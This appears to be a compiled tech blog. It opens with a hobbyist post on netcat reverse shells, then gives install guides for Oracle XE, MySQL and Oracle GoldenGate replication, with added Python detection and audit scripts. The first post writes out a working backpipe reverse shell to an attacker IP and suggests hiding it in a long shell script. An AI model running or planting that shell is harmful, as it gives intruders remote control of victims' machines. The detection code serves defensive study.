Reverse Shell with Netcat

I’ve been exploring different tools to simulate hacking a system and practice penetration testing. Probably one of the tools that I find most useful (aside from nmap) is the command netcat. This utility is used to read and write data across network connections. I find it interesting that you can actually open up a command shell (or reverse shell) to a remote computer. Upon research, you can open up a shell by running the following commands:

From the attacker’s computer, he can open up a listening port:

nc -nvlp 9999
(where 9999 is any port)

On the target’s computer, the following commands need to be executed, either by tricking the user or by executing the code through a web application:

mknod /tmp/backpipe p

/bin/sh 0</tmp/backpipe | nc <attackers_ip> 9999 1>/tmp/backpipe

Once the code is executed on the target, you will see confirmation in the attacker’s shell that a connection has been made. From there, you can execute the usual Linux commands. Take note that it might appear as a blank screen, but treat that blank screen as a Linux shell: type Linux commands and you will see the output.

Now I am exploring other ways to open up a remote shell using the tools readily available on every OS. Probably one of the biggest challenges is how to execute those commands on the victim’s computer. Compromising a .sh script would probably do: in a very long .sh script of commonly used commands, somehow append the pipe commands and add & to them. For the sake of opening ideas in the world of penetration testing, I’ll play around and see if it works.
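From the defender’s side, the backpipe technique above leaves a recognisable trace in process auditing: a named pipe is created, and a shell’s stdin/stdout are wired into netcat on the same command line. The following is an added example (not part of the original post) that runs three simple rules over a constructed list of process records and raises the severity when one user has both halves of the pattern. The log lines, PIDs and user names are all made up for the demonstration.

```python
"""Flag process command lines that match the netcat backpipe pattern.

Added example, not from the original post. The process records below are
constructed: (pid, user, command line) as a process-accounting or auditd
EXECVE collector might report them.
"""
import re
from collections import defaultdict

# Constructed sample input: a mix of the technique shown above and benign
# uses of netcat listeners and named pipes.
SAMPLE_PROCESS_LINES = [
    "1021 www-data /bin/sh 0</tmp/backpipe | nc 203.0.113.5 9999 1>/tmp/backpipe",
    "1022 www-data mknod /tmp/backpipe p",
    "1130 alice nc -nvlp 9999",
    "1201 root /usr/sbin/sshd -D",
    "1250 alice ssh -p 2222 backup@203.0.113.9",
    "1300 bob mkfifo /tmp/build.fifo",
    "1301 bob tail -f /var/log/syslog > /tmp/build.fifo",
    "1400 alice tar czf backup.tgz /home/alice",
]

NC = r"\b(?:nc|netcat|ncat)\b"
# a shell binary at the start of the line or after a space or slash
SHELL = r"(?:^|[\s/])(?:ba|da|z)?sh\b"

RULES = {
    # named pipe creation: harmless on its own, but the first half of the backpipe
    "named_pipe": re.compile(r"\bmknod\b\s+\S+\s+p\b|\bmkfifo\b"),
    # a shell whose output is piped into netcat on the same command line
    "shell_piped_to_nc": re.compile(SHELL + r".*\|.*" + NC),
    # netcat started with a listen flag (-l, or -l bundled as in -nvlp)
    "nc_listener": re.compile(NC + r"(?=.*\s-\w*l\w*(?:\s|$))"),
}


def scan(lines):
    """Return {pid: (user, [matched rule names])} for records hitting a rule."""
    hits = {}
    for line in lines:
        pid, user, cmd = line.split(" ", 2)
        matched = [name for name, rx in RULES.items() if rx.search(cmd)]
        if matched:
            hits[pid] = (user, matched)
    return hits


def correlate(lines):
    """Per-user verdict: the pipe creation plus a shell piped into netcat is
    the backpipe reverse shell; either half alone is graded lower."""
    per_user = defaultdict(set)
    for user, matched in scan(lines).values():
        per_user[user].update(matched)
    verdict = {}
    for user, names in per_user.items():
        if {"named_pipe", "shell_piped_to_nc"} <= names:
            verdict[user] = "high: backpipe reverse shell"
        elif "shell_piped_to_nc" in names:
            verdict[user] = "high: shell piped to netcat"
        elif "nc_listener" in names:
            verdict[user] = "medium: netcat listener"
        else:
            verdict[user] = "low: named pipe only"
    return verdict


if __name__ == "__main__":
    for user, v in sorted(correlate(SAMPLE_PROCESS_LINES).items()):
        print(f"{user:10s} {v}")
```

The per-user correlation is the point: a named pipe or a netcat listener each have legitimate uses, so alerting on either alone is noisy, whereas the pairing seen for www-data is what the post’s two commands produce.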

Installing Oracle 11g Release 2 Express Edition in Ubuntu 13.04 (Unsupported OS)

I am going to demonstrate how to install Oracle 11gR2 Express Edition in Ubuntu 13.04. Take note that Ubuntu is not supported by Oracle, but I will still attempt to install the platform. I used the following source as the basis for my installation:

Make sure you download Oracle 11g Release 2 Express Edition x64 (the only available CPU architecture for the XE edition) and place it in a directory that you can work in before proceeding further:

Installation prerequisites:

1. Install the needed packages:
shell> sudo apt-get install alien libaio1 unixodbc vim

2. While the packages are downloading, you can also unzip the Oracle database file you downloaded earlier, as both will take some time:
shell> unzip

3. Next, we need to convert the .rpm file to a .deb file with the following command:
shell> sudo alien --scripts -d oracle-xe-11.2.0-1.0.x86_64.rpm

While doing this step, you may proceed to the next step, as this may take time:

Pre-installation configuration

1. We will create a special chkconfig script in this step. The Red Hat based installer of Oracle XE 11gR2 relies on /sbin/chkconfig, which is not used in Ubuntu. The chkconfig package available for the current version of Ubuntu produces errors and may not be safe to use. Based on the source I followed, below is a simple trick to get around the problem and install Oracle XE successfully:

shell> sudo vim /sbin/chkconfig
(copy and paste the following into the file)
#!/bin/bash
# Oracle 11gR2 XE installer chkconfig hack for Ubuntu
file=/etc/init.d/oracle-xe
if [[ ! `tail -n1 $file | grep INIT` ]]; then
echo >> $file
echo '### BEGIN INIT INFO' >> $file
echo '# Provides: OracleXE' >> $file
echo '# Required-Start: $remote_fs $syslog' >> $file
echo '# Required-Stop: $remote_fs $syslog' >> $file
echo '# Default-Start: 2 3 4 5' >> $file
echo '# Default-Stop: 0 1 6' >> $file
echo '# Short-Description: Oracle 11g Express Edition' >> $file
echo '### END INIT INFO' >> $file
fi
update-rc.d oracle-xe defaults 80 01
Save the above file and give it the appropriate execute permission:
shell> sudo chmod 755 /sbin/chkconfig
2. Set the kernel parameters:

Oracle 11gR2 XE requires the following additional kernel parameters:
shell> sudo vim /etc/sysctl.d/60-oracle.conf
(Enter the following):
# Oracle 11g XE kernel parameters
fs.file-max=6815744
net.ipv4.ip_local_port_range=9000 65000
kernel.sem=250 32000 100 128
kernel.shmmax=536870912
(Save the file)
Note: fs.file-max = 6815744 is the value the verification step below expects. kernel.shmmax = max possible value, e.g. the size of physical RAM in bytes (512MB RAM == 512*1024*1024 == 536870912 bytes); adjust it to your machine.
Verify the change:
shell> sudo cat /etc/sysctl.d/60-oracle.conf
Load the new kernel parameters:
shell> sudo service procps start
Verify: sudo sysctl -q fs.file-max
This should print: fs.file-max = 6815744
3. Increase the system swap space. Analyze your current swap space with the following command:

shell> free -m
**Swapfile Notes: The minimum swap space requirement of Oracle 11gR2 XE is 2 GB. In case yours is smaller, you can increase it with the following steps (mine was originally 1GB only):
a) switch to root and perform the following commands:
shell> su root
shell> dd if=/dev/zero of=/swapfile bs=1024 count=2097152 (Preferably, you should set the count to 1048576. This adds 1GB to the current total of 1GB = 2GB. Mine totalled 3GB.)
shell> mkswap /swapfile
shell> swapon /swapfile
shell> cp /etc/fstab /etc/fstab.orig (This is a backup of the original fstab)
shell> echo '/swapfile swap swap defaults 0 0' >> /etc/fstab (Adds the entry for the new swap to fstab so it is enabled on boot)
Verify with:
shell> swapon -a; swapon -s

Just in case you want to revert to the original config, perform the following:
shell> sudo swapoff -a
shell> sudo rm /swapfile

shell> sudo cp /etc/fstab /etc/fstab.changed; sudo cp /etc/ /etc/fstab
shell> sudo swapon -a; swapon -s

End of Swapfile Notes**

We need to make some additional required changes (as root, or with sudo):
shell> sudo ln -s /usr/bin/awk /bin/awk
shell> sudo mkdir /var/lock/subsys
shell> sudo touch /var/lock/subsys/listener
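Before running the installer it is worth checking the prerequisites from the steps above in one place. The following added example (not part of the original post) parses the output of free -m and the sysctl fragment, reports the swap shortfall against the 2 GB minimum, and computes the dd count that would close it using the same bs=1024 block size as the dd command above. The free -m output and the sysctl fragment it parses are constructed samples.

```python
"""Pre-flight check for the Oracle 11gR2 XE prerequisites described above.

Added example, not from the original post. SAMPLE_FREE_M and
SAMPLE_SYSCTL_CONF are constructed inputs standing in for real output of
`free -m` and the contents of /etc/sysctl.d/60-oracle.conf.
"""

REQUIRED_SWAP_MB = 2048        # Oracle 11gR2 XE minimum from the swapfile notes
DD_BLOCK_SIZE = 1024           # bs=1024 as in the dd command above
REQUIRED_SYSCTL = {            # keys and values the steps above expect
    "fs.file-max": "6815744",
    "net.ipv4.ip_local_port_range": "9000 65000",
    "kernel.sem": "250 32000 100 128",
}

SAMPLE_FREE_M = """\
             total       used       free     shared    buffers     cached
Mem:          3951       2210       1740          0        123        934
-/+ buffers/cache:       1152       2798
Swap:         1023          0       1023
"""

SAMPLE_SYSCTL_CONF = """\
# Oracle 11g XE kernel parameters
fs.file-max=6815744
net.ipv4.ip_local_port_range=9000 65000
kernel.sem = 250 32000 100 128
"""


def _free_row(free_output, label):
    """Return the 'total' column (in MB) of the Mem: or Swap: row."""
    for line in free_output.splitlines():
        if line.startswith(label):
            return int(line.split()[1])
    raise ValueError(f"no {label} row in free -m output")


def swap_total_mb(free_output):
    return _free_row(free_output, "Swap:")


def mem_total_mb(free_output):
    return _free_row(free_output, "Mem:")


def swap_shortfall_mb(total_mb, required_mb=REQUIRED_SWAP_MB):
    return max(0, required_mb - total_mb)


def dd_count_for_mb(mb, block_size=DD_BLOCK_SIZE):
    """Number of `block_size` blocks dd must write to produce `mb` megabytes."""
    return mb * 1024 * 1024 // block_size


def shmmax_for_mem_mb(mem_mb):
    """kernel.shmmax set to the physical RAM size in bytes, as in the note above."""
    return mem_mb * 1024 * 1024


def parse_sysctl_conf(text):
    """Parse 'key=value' / 'key = value' lines; '#' starts a comment."""
    params = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition("=")
        params[key.strip()] = " ".join(value.split())   # normalise whitespace
    return params


def missing_sysctl(text, required=REQUIRED_SYSCTL):
    """Required keys that are absent or carry a different value."""
    have = parse_sysctl_conf(text)
    return {k: v for k, v in required.items() if have.get(k) != v}


def prereq_report(free_output, sysctl_text):
    swap = swap_total_mb(free_output)
    shortfall = swap_shortfall_mb(swap)
    return {
        "swap_total_mb": swap,
        "swap_shortfall_mb": shortfall,
        "dd_count": dd_count_for_mb(shortfall),
        "suggested_shmmax": shmmax_for_mem_mb(mem_total_mb(free_output)),
        "missing_sysctl": missing_sysctl(sysctl_text),
    }


if __name__ == "__main__":
    for k, v in prereq_report(SAMPLE_FREE_M, SAMPLE_SYSCTL_CONF).items():
        print(f"{k}: {v}")
```

With the constructed 1023 MB of swap the report asks for a 1025 MB swapfile (count=1049600); dd_count_for_mb(1024) and dd_count_for_mb(2048) give the 1048576 and 2097152 counts quoted in the swapfile notes.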
Installation of Oracle 11gR2 XE
1. Going back to the directory where we converted the installation package of Oracle XE, we perform the following commands to install the package:
shell> sudo dpkg --install oracle-xe_11.2.0-2_amd64.deb
(Note: If you encounter any ‘shared memory’ error or anything else related to memory, look through the source I followed for more information.)
shell> sudo /etc/init.d/oracle-xe configure
Enter the following configuration information:
  • A valid HTTP port for the Oracle Application Express (the default is 8080)
  • A valid port for the Oracle database listener (the default is 1521)
  • A password for the SYS and SYSTEM administrative user accounts
  • Confirm password for SYS and SYSTEM administrative user accounts
  • Whether you want the database to start automatically when the computer starts (next reboot).

Note: I pretty much used the default configuration here, except for the password of course.

IMPORTANT: If the previous step or the configuration fails to complete, then you may have encountered the problem for which the link above was created. The author explained in the link above the reason for the failure. Nevertheless, you will need to reinstall the package. This happened to me; I followed the troubleshooting guide created by the author and everything went well afterwards.

2. We need to set up the environment variables to ensure the database will run. Add the following lines to your .bashrc:
shell> vi ~/.bashrc
export ORACLE_HOME=/u01/app/oracle/product/11.2.0/xe
export ORACLE_SID=XE
export NLS_LANG=`$ORACLE_HOME/bin/`
export ORACLE_BASE=/u01/app/oracle
export PATH=$ORACLE_HOME/bin:$PATH

3. Load the changes:
shell> . ./.profile (run this from your home directory, or type cd before this command)
shell> sudo service oracle-xe start (mine was running already)

Configuring User Accounts in Oracle 11gR2 XE

1. Log in to the database as follows:

shell> sqlplus / as sysdba
Note: If you get the error ORA-01031: insufficient privileges after the above command, it means you need to add your user to the dba group. Perform the following:
shell> su root
shell> vim /etc/group
Add your user name at the end of the dba:x:1001: line.

2. Create a user account using the following commands:
sqlplus> create user <username> identified by <password>;
sqlplus> grant connect, resource to <username>;

3. Now try logging in to that user account using the username you’ve just created:
shell> sqlplus
Enter username:
Enter password:

Easy installation of MySQL in Linux Mint 15

The recommended database for database novices is MySQL. Being a light database, MySQL is easy to use and configure. Also, distributions such as Debian-based Linux Mint already have packages ready to be installed from the default repository. In this post, let me demonstrate how I installed MySQL:

Steps taken to install MySQL in Linux Mint:

1. Install the MySQL client:
bash> sudo apt-get install mysql-client

2. Install the MySQL server:
bash> sudo apt-get install mysql-server
Note: During installation of mysql-server, you will be prompted to enter the root password. It is recommended to set one.

3. Test whether the installation was successful using the following commands:
bash> /usr/bin/mysqladmin version
bash> /usr/bin/mysqladmin variables
Note: You should see output showing details about mysql.

4. Upon installation of mysql, a database named ‘test’ is already created by default. Test the connection by connecting to the database:
bash> mysql -u test
You can now connect to the database.

5. You can add user accounts using the following commands:
bash> mysql -u root -p                   (log in as root first)
mysql> GRANT USAGE ON test.* TO user@localhost
    -> IDENTIFIED BY 'test';
This creates an account named ‘user’ with the password ‘test’ on the database named test and all its tables (denoted by *).

Additional Options:
You can also grant privileges to user accounts:
mysql> GRANT SELECT ON test.* TO user@localhost;
This gives the account ‘user’ read privileges (SELECT statement) on the database ‘test’.
If you want the user full control over the database, you can also do:
mysql> GRANT ALL ON test.* TO user@localhost;

Integrating Oracle Goldengate 11 with MySQL in Windows 7


Installing Oracle Goldengate (OGG) in Windows 7 is much easier than in Linux because most configurations are done via GUI tools:


1. Download and install the MySQL client (I downloaded mine via the MySQL Workbench)

2. Download and install the MySQL ODBC driver (this is to ensure Windows 7 is able to communicate with the MySQL database)

3. Download and extract GoldenGate for Windows 7 in a folder

During installation of MySQL, I made the settings as default to simplify the process but you may go change certain options if you like. Just make sure that you remember the port you assign to MySQL (default is 3306).

The scenario I am going to demonstrate is an initial load. This means migrating a table from a database to an empty table in another database. Usually, the other database would be located on a remote location, but for this example I will be using a loopback address, meaning both source and target tables are in the same system.


Locate the installation folder of MySQL and look for the file my.ini (in Windows x64, it could be in several folders located in ProgramData, Program Files (x86) or Program Files; make sure you ONLY have one folder containing the configuration file my.ini). MySQL can get confused if more than one my.ini exists. Mine is located in Program Files. If two my.ini files exist in two different folders, make sure at least that both have the same contents.

1. Open my.ini with a text editor, look for [mysqld] and enter the following line under it:

log-bin = "C:/Program Files/MySQL/MySQL Server 5.6/log/localhost.bin"

Notes: GoldenGate usually reads the MySQL transaction log (binary log) files to capture changes, so it’s best to set this up early. However, the example I am going to demonstrate obtains the data directly from the tables themselves.

2. After extracting the Goldengate files in a folder, open the Goldengate directory and look for the ggsci.exe program. Run it and a command line should pop up; enter CREATE SUBDIRS in the command line to create the folders it needs.


1. Create a database in MySQL as your source database. It should contain at least one table. Preferably, use a script just in case you mess up your configuration later on; MySQL makes this easy by saving your scripts. As an example, I used the following script to create a source database named ‘project’ and a table ‘nbarankings2013’:

CREATE DATABASE IF NOT EXISTS project;
USE project;

CREATE TABLE NBArankings2013 (
  NBATeam varchar(255) NOT NULL,
  Division varchar(255) NOT NULL,
  WinPerc decimal(8,3) NOT NULL,
  GB decimal(8,1) NOT NULL,
  Conference varchar(255) NOT NULL
);

INSERT INTO NBArankings2013 (NBATeam, Division, WinPerc, GB, Conference)
VALUES ('New York', 'Atlantic', '0.659', '12', 'East'),
('Brooklyn', 'Atlantic', '0.598', '17', 'East'),
('Boston', 'Atlantic', '0.506', '24.5', 'East'),
('Philadelphia', 'Atlantic', '0.415', '32', 'East'),
('Toronto', 'Atlantic', '0.415', '32', 'East'),
('Indiana', 'Central', '0.605', '16.5', 'East'),
('Chicago', 'Central', '0.549', '21', 'East'),
('Milwaukee', 'Central', '0.463', '28', 'East'),
('Detroit', 'Central', '0.354', '37', 'East'),
('Cleveland', 'Central', '0.293', '42', 'East'),
('Miami', 'Southeast', '0.805', '0', 'East'),
('Atlanta', 'Southeast', '0.537', '22', 'East'),
('Washington', 'Southeast', '0.354', '37', 'East'),
('Charlotte', 'Southeast', '0.256', '45', 'East'),
('Orlando', 'Southeast', '0.244', '46', 'East'),
('San Antonio', 'Southwest', '0.707', '2', 'West'),
('Memphis', 'Southwest', '0.683', '4', 'West'),
('Houston', 'Southwest', '0.549', '15', 'West'),
('Dallas', 'Southwest', '0.5', '19', 'West'),
('New Orleans', 'Southwest', '0.329', '33', 'West'),
('Oklahoma City', 'Northwest', '0.732', '0', 'West'),
('Denver', 'Northwest', '0.695', '3', 'West'),
('Utah', 'Northwest', '0.524', '17', 'West'),
('Portland', 'Northwest', '0.402', '27', 'West'),
('Minnesota', 'Northwest', '0.376', '29', 'West'),
('LA Clippers', 'Pacific', '0.683', '4', 'West'),
('Golden State', 'Pacific', '0.573', '13', 'West'),
('LA Lakers', 'Pacific', '0.549', '15', 'West'),
('Sacramento', 'Pacific', '0.341', '32', 'West'),
('Phoenix', 'Pacific', '0.305', '35', 'West');

-- check that the rows were inserted
SELECT * FROM nbarankings2013;

Using MySQL is pretty easy; I am sure you can configure things by yourself. Create another database which will be your target database, and create an empty table in it with the same name as the table I used above. In this case, I used a target database named ‘projectext’ containing a table ‘nbarankings2013’.

Open up the MySQL command line and confirm that the table from projectext, the target database, is empty:

MySQL> SELECT * FROM nbarankings2013;


1. Open the Data Source (ODBC) panel by typing Data Source in the search bar of Windows.
2. Create a new connection to the source database by pressing Add and choosing the MySQL driver you’ve installed. Fill out the details and make sure you are using the correct TCP/IP settings. In my case, I used the loopback address and 3306 as server and port, respectively. Use the username and password you use to connect to the database in MySQL (I’m pretty sure you’ve configured this when you created the database). Lastly, choose the source database.
3. Click the Test button to check connectivity.
4. Repeat the same setup using the target database this time.



1. Start ggsci.exe
2. In the command line, type EDIT PARAMS MGR. This should prompt you to create a new .prm file which will hold the configuration of the MGR process. For now, you only need one parameter in the text file:
PORT 7089

3. Type START MGR in the command line to start the manager process. Confirm this with INFO MGR.
4. Next, create an Extract process named INITLOD1 and open its parameter file with EDIT PARAMS INITLOD1. A new file will pop up and you need to fill out the configuration. I used the following:


SOURCEDB project, USERID root@project, PASSWORD ******
RMTFILE ./dirdat/el1.dat, PURGE
TABLE project.*;

5. Create the REPLICAT process. My configuration is as follows:

TARGETDB projectext, USERID root@projectext, PASSWORD Goldengate112!
ASSUMETARGETDEFS
EXTFILE ./dirdat/el1.dat
DISCARDFILE ./dirrpt/el1.dsc, PURGE
MAP project.*, TARGET projectext.*;

6. To start the migration process, i.e. copying the table from project to the table in projectext, execute the following commands:

ggsci> START EXTRACT INITLOD1 (Several windows should pop up; wait for it to stop)
ggsci> VIEW REPORT INITLOD1 (Look at the bottom of the page for errors. If the process was successful, you should be able to see the Run Time Statistics, which tell us how many rows were copied.)


Next run the replicat process:


Notes: You can also check with the INFO ALL command to see whether any of the processes has abended.


If all the processes executed with no problem, you should be able to see contents in the table from the target database (in my case, projectext should have received the data).

Execute the MySQL command line client:

MySQL> SELECT * FROM nbarankings2013;

The data should show up.

Integrating Oracle Goldengate 11 with Oracle Database 11g release2 in Oracle Enterprise Linux 6.4

I am writing this with the aim of giving other IT professionals some tips on installing this very unique and valuable product from Oracle. When I first integrated this program, I had to go through several sources and make several experiments, as not all sources would have the same setup as mine. Make sure you read something about Goldengate first before proceeding. So, with the hope of helping other people, here are my steps in installing Oracle Golden Gate:

Steps taken to install Oracle Database 11G

1. Download Oracle Database 11gR2 and Goldengate from the Oracle website.
2. Open a terminal, switch to root and perform the following commands:
bash> cd /etc/yum.repos.d
bash> wget or (mine worked with the former)
bash> yum install oracle-rdbms-server-11gR2-preinstall

(See the reference at the bottom of the page for the purpose of this package)
3. bash> export DISTR=/home/dba/app/oracle -> shortcut to the database directory (this is optional but makes things easier; note that DISTR disappears when changing user)
4. bash> unzip and …
5. cd $DISTR/database and type ./runInstaller -> configured the settings using the GUI setup:
-> no email
-> Create and configure a database
-> Desktop class
-> Oracle base – /home/dba/app/dba
-> SW – /home/dba/app/dba/product/11.2.0/dbhome_1
-> DB – /home/dba/app/dba/oradata
-> Global database name – orcl
-> oraInventory – dba
-> prompted for missing dependencies -> installed missing dependencies

(In this step, you can pretty much configure the options from the GUI tool, but see above for my configuration. You can also see my source, at the end of the page, to see how he installed everything in one command.)

6. At the end of the GUI installation, you may be prompted to install missing dependencies. Use the command yum list | grep missingdependency to search for each dependency. For example:

bash> yum list | grep unixODBC -> yum install unixODBC-devel.x86_64
-> other missing dependencies are for i386 or i686 systems

In step 6, make sure you check each missing dependency and see whether you need it. You’ll notice that some of them refer to a specific CPU architecture. Check on your system whether the one with the right architecture is installed. Sometimes the installer may say that you haven’t installed the dependency: in my case I had already installed unixODBC-devel.x86_64 but it said I hadn’t installed unixODBC-devel.x86. If this happens, just ignore the prompts for the missing dependencies IF you are sure you have already installed them.

7. Installation
-> executed the scripts required by the installer using sh (on this part, just follow the prompts from the installer; I used the command sh to run the scripts)
-> installation successful:
Enterprise Manager Database Control URL – (orcl):

Next I set up the environment variables; make sure you point them to the right directory, as we may have different directories.
8. export ORACLE_HOME=/home/dba/app/dba/product/11.2.0/dbhome_1
9. export PATH=$ORACLE_HOME/bin:$PATH
10. dbca -silent -createDatabase -templateName General_Purpose.dbc -gdbName base11r2 -sysPassword ***** -systemPassword ***** -emConfiguration NONE -datafileDestination /home/dba/app/oracle/oradata -storageType FS (This creates a sample database)
11. lsnrctl start (Starts up the listener)

Steps taken to install Oracle GoldenGate

1. Download Oracle GoldenGate 11g
2. Extract the archive to /home/dba/app/gg (using the built-in Archive Manager) -> ogg11 folder created
3. export GGATE=/home/dba/app/dba/product/gg/ogg11 (again, this is optional but may simplify things)
4. tar -xf <goldengate>.tar
5. export LD_LIBRARY_PATH=$ORACLE_HOME/lib:/home/dba/app/dba/product/gg/ogg11 (This is very important: without it ./ggsci will not work)
6. bash> ./ggsci (This runs the goldengate program and you will enter a command console for goldengate)
7. ggsci> create subdirs (This command creates the folders goldengate needs)
8. exit

Preparing the replication process
1. verified that tnsnames.ora exists (vi tnsnames.ora)
2. export ORACLE_SID=base11r2 (this should refer to the name of the database, see step 10 from Installing Oracle Database)
3. run the shell and type sqlplus / as sysdba, then:
a. sqlplus> shutdown immediate
b. sqlplus> startup mount
c. sqlplus> alter database archivelog;
d. sqlplus> alter database open;
e. sqlplus> alter database add supplemental log data;
f. sqlplus> alter system set recyclebin=off scope=spfile;
g. sqlplus> create user ggate identified by qwerty default tablespace users temporary tablespace temp; (user ggate created)
h. sqlplus> grant connect, resource, unlimited tablespace to ggate;
sqlplus> grant execute on utl_file to ggate; (privileges granted to ggate)

**NOTE: the goldengate directory should be located in the same directory as the Oracle scripts (inside the installation of the Oracle DB)
4. run the goldengate scripts inside sqlplus with the schema ggate:
a. sqlplus> @$GGATE/marker_setup.sql
b. sqlplus> @$GGATE/ddl_setup.sql
c. sqlplus> @$GGATE/role_setup.sql
d. sqlplus> grant GGS_GGSUSER_ROLE to ggate;
e. sqlplus> @$GGATE/ddl_enable.sql
5. create the test schemas: sender (source) and receiver (target)
a. sqlplus> create user sender identified by qwerty default tablespace users temporary tablespace temp;
b. sqlplus> grant connect, resource, unlimited tablespace to sender;
c. sqlplus> create user receiver identified by qwerty default tablespace users temporary tablespace temp;
d. sqlplus> grant connect, resource, unlimited tablespace to receiver;

Configuring the processes in goldengate (take note that I am using localhost as both target and source system to demonstrate goldengate)
Starting in the source system:
1. bash> ./ggsci

ggsci> EDIT PARAMS MGR (a .prm file will be created; in the file type PORT 7089)
2. ggsci> START MGR
3. ggsci> INFO MGR (check if MGR is running)
4. ggsci> ADD EXTTRAIL /home/dba/app/dba/product/gg/ogg11/dirdat/el, extract INITLOD1
5. ggsci> EDIT PARAMS INITLOD1 (A new text file will open for the configuration; input the following)

USERID ggate, PASSWORD qwerty
RMTHOST localhost, MGRPORT 7089
RMTTRAIL /home/dba/app/dba/product/gg/ogg11/dirdat/el
TABLE sender.*;

(Save and close the file.)
Notes: INITLOD1 will be your Extract process.

For the target system:
1. ggsci> EDIT PARAMS ./GLOBALS -> names the checkpoint table
2. ggsci> DBLOGIN USERID GGATE -> login successful
3. ggsci> ADD CHECKPOINTTABLE ggate.checkpoint
4. ggsci> ADD REPLICAT CHGSYNC, EXTTRAIL /home/dba/app/dba/product/gg/ogg11/dirdat/el, checkpointtable ggate.checkpoint
5. ggsci> EDIT PARAMS CHGSYNC (This will be your Replicat process)

USERID ggate, PASSWORD qwerty
DISCARDFILE /home/dba/app/dba/product/gg/ogg11/discard/chgsync_discard.txt, APPEND, MEGABYTES 10

DDL MAP sender.*, TARGET receiver.*;

(Save and close the file.)
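Both the MySQL parameter files earlier in this post and the Extract/Replicat files just above keep the database password in cleartext (PASSWORD qwerty) and, in the MySQL case, connect as root. A small audit over the dirprm directory catches both before the files spread to other hosts. The following is an added example, not part of the original post or of GoldenGate itself: it scans constructed .prm contents modelled on the ones shown here, flags a PASSWORD clause that lacks an ENCRYPTKEY clause on the same line and flags a privileged USERID. The encrypted value in the hardened sample is a placeholder, not a real GoldenGate-encrypted string.

```python
"""Audit GoldenGate parameter files for cleartext passwords and privileged
database accounts.

Added example, not from the original post. SAMPLE_PRM_FILES holds
constructed file contents modelled on the parameter files in this post;
the ENCRYPTED_VALUE_PLACEHOLDER token stands in for a real encrypted value.
"""
import re

SAMPLE_PRM_FILES = {
    "dirprm/initlod1.prm": (
        "SOURCEDB project, USERID root@project, PASSWORD Secr3t!\n"
        "RMTFILE ./dirdat/el1.dat, PURGE\n"
        "TABLE project.*;\n"
    ),
    "dirprm/chgsync.prm": (
        "-- replicat parameters (GoldenGate comment line)\n"
        "USERID ggate, PASSWORD qwerty\n"
        "DISCARDFILE ./dirrpt/chgsync_discard.txt, APPEND, MEGABYTES 10\n"
        "MAP sender.*, TARGET receiver.*;\n"
    ),
    "dirprm/hardened.prm": (
        "USERID ggate, PASSWORD ENCRYPTED_VALUE_PLACEHOLDER, ENCRYPTKEY DEFAULT\n"
        "MAP sender.*, TARGET receiver.*;\n"
    ),
}

PASSWORD_RX = re.compile(r"\bPASSWORD\s+([^\s,]+)", re.IGNORECASE)
USERID_RX = re.compile(r"\bUSERID\s+([^\s,]+)", re.IGNORECASE)
ENCRYPTKEY_RX = re.compile(r"\bENCRYPTKEY\b", re.IGNORECASE)
# accounts that should never be used for a replication process
PRIVILEGED_ACCOUNTS = {"root", "sys", "system"}


def scan_prm(text):
    """Return [(line number, finding)] for one parameter file's contents."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("--", 1)[0]          # strip GoldenGate '--' comments
        if PASSWORD_RX.search(line) and not ENCRYPTKEY_RX.search(line):
            findings.append((lineno, "cleartext_password"))
        uid = USERID_RX.search(line)
        if uid:
            user = uid.group(1).split("@", 1)[0].lower()   # root@project -> root
            if user in PRIVILEGED_ACCOUNTS:
                findings.append((lineno, "privileged_account:" + user))
    return findings


def scan_all(files):
    """Map file name -> findings, omitting clean files."""
    report = {}
    for name, text in files.items():
        findings = scan_prm(text)
        if findings:
            report[name] = findings
    return report


def redact(text):
    """Copy of the file contents safe to paste into a ticket or chat."""
    return PASSWORD_RX.sub("PASSWORD <redacted>", text)


if __name__ == "__main__":
    for name, findings in scan_all(SAMPLE_PRM_FILES).items():
        for lineno, finding in findings:
            print(f"{name}:{lineno}: {finding}")
```

The hardened sample passes because the PASSWORD clause is accompanied by ENCRYPTKEY; the fix for the flagged files is to use a dedicated replication account like the ggate user created above rather than root, and to replace the cleartext value with one produced by GoldenGate’s password encryption.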


Wait for a few seconds and check with INFO ALL; make sure MGR, EXTRACT and REPLICAT are running.


Log in to the database with the command sqlplus / as sysdba from the shell:
1. sqlplus> create table sender.test_table1 (id number, rnd_str varchar2(12));
2. sqlplus> insert into sender.test_table1 values (1, 'test_1');
3. sqlplus> commit; -> to save the transaction
4. sqlplus> select * from receiver.test_table1;

Notes: After you insert a value into sender.test_table1 and commit the transaction, you should be able to see the same values in receiver.test_table1.